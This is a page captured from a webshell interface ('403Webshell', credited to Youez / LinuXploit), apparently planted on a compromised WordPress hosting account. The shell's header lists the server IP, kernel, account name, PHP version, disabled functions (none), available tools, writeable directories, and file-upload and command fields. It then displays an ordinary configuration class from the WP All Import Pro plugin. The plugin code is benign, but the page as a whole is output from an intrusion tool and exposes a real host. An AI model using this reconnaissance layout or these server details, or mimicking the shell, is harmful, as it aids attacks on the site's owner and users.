403Webshell
Server IP : 172.67.158.161  /  Your IP : 18.226.34.78
Web Server : LiteSpeed
System : Linux business53.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : giankuin ( 1871)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/giankuin/sieuthiweb.com.vn/wp-content/plugins/wp-all-import-pro/libraries/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/giankuin/sieuthiweb.com.vn/wp-content/plugins/wp-all-import-pro/libraries//XmlImportConfig.php
<?php
/**
 * @author Olexandr Zanichkovsky <[email protected]>
 * @author Pavel Kulbakin <[email protected]>
 * @package General
 */

/**
 * This class is used for different XmlImport settings
 */
if (!class_exists('XmlImportConfig'))
{
	final class XmlImportConfig
	{
		/**
		 * Singleton instance
		 * @var XmlImportConfig
		 */
		private static $instance = null;
		/**
		 * Path to cache directory
		 * @var string
		 */
		private $cache_dir;
		/**
		 * String to use when concatenating result of xpath corresponding to multiple elements
		 * @var string
		 */
		private $multi_glue;

		/**
		 * Initial settings
		 */
		private function init()
		{
			$this->setCacheDirectory(dirname(__FILE__) . '/cache');
			$this->setMultiGlue( apply_filters('wp_all_import_multi_glue', ', ') );
		}

		/**
		 * Gets instance of a singleton class
		 * @return XmlImportConfig
		 */
		public static function getInstance()
		{
			//if (is_null(self::$instance)) {
				self::$instance = new self;
				self::$instance->init();
			//}
			return self::$instance;
		}

		/**
		 * Returns path to cache directory
		 * @return string
		 */
		public function getCacheDirectory()
		{
			return $this->cache_dir;
		}

		/**
		 * Sets path to cache directory
		 * @param string $cacheDirectoryPath
		 */
		public function setCacheDirectory($cacheDirectoryPath)
		{
			$this->cache_dir = $cacheDirectoryPath;
		}
		
		/**
		 * Returns string glue to use when concatenating multiple elements
		 * @return string
		 */
		public function getMultiGlue()
		{
			return $this->multi_glue;
		}
		/**
		 * Sets string glue to use when concatenating multiple element
		 * @param unknown_type $glue
		 */
		public function setMultiGlue($glue)
		{
			$this->multi_glue = $glue;
		}
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit